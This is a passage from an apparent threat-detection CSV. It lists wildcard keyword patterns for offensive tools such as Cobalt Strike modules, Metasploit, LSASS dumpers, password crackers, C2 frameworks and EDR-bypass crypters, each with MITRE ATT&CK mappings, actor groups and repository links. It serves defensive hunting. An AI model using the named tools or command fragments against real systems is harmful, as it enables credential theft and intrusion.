- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openPortScanner*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openSpearPhishDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openssl_heartbleed.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*openssl2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*OpenVAS*,offensive_tool_keyword,openvas,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.openvas.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*openwall.John.appdata.xml*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openwall.John.desktop*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openwall/john*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*openWindowsExecutableStage*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*opera* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*opera.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*Operative Framework*,offensive_tool_keyword,Operative Framework,Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.,T1590 - T1591 - T1592 - T1593 - T1594 - T1595,TA0007 - TA0011 - TA0007,N/A,N/A,Frameworks,https://github.com/graniet/operative-framework,1,0,N/A,N/A,7,634,180,2023-05-12T06:20:09Z,2017-01-03T08:38:59Z -*ophcrack*,offensive_tool_keyword,ophcrack,Windows password cracker based on rainbow tables.,T1110.003 - T1555.003 - T1110.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://gitlab.com/objectifsecurite/ophcrack,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*optiv/Ivy.git*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*optiv/Registry-Recon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Registry-Recon,1,1,N/A,10,10,314,36,2022-06-06T14:39:12Z,2021-07-29T18:47:23Z -*optiv/ScareCrow*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*optiv/ScareCrow*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*oracle_default_hashes.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*oracle_default_passwords.csv*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*orbitaldump.py*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*orbitaldump/orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*OrderFromC2 = ReadEmail()*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*os.execute(*/bin/*nmap --script=$*,greyware_tool_keyword,nmap,Nmap Privilege Escalation,T1548.002 - T1059 - T1068,TA0002,N/A,N/A,Privilege Escalation,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*OS-Command-Injection-Unix-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*OS-Command-Injection-Windows-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*OSCP-Archives*,offensive_tool_keyword,OSCP-Archives,resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.',T1593 - T1592 - T1596,TA0001 - TA0043 - ,N/A,N/A,Exploitation tools,https://github.com/CyDefUnicorn/OSCP-Archives,1,1,N/A,N/A,7,601,196,2020-09-14T13:01:57Z,2018-09-15T16:18:05Z -*osmedeus cloud*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus health*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus provider*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus scan*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osmedeus utils*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*osx/dump_keychain*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*osx_gatekeeper_bypass.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*OtterHacker/SetProcessInjection*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*ourtn-ftshell-upcommand*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,0,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*--out=nimcrypt*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*Out-CompressedDLL.ps1*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Out-DnsTxt.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Outflank-Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Outflank-Dumpert.*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*outflanknl/Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*outflanknl/EvilClippy*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*outflanknl/Net-GPPPassword*,offensive_tool_keyword,Net-GPPPassword,.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.,T1059.001 - T1552.007,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/outflanknl/Net-GPPPassword,1,1,N/A,10,2,156,37,2019-12-18T10:14:32Z,2019-10-14T12:35:46Z -*outflanknl/Recon-AD*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*outflanknl/SharpHide*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*outflanknl/Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*outflanknl/WdToggle*,offensive_tool_keyword,cobaltstrike,s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 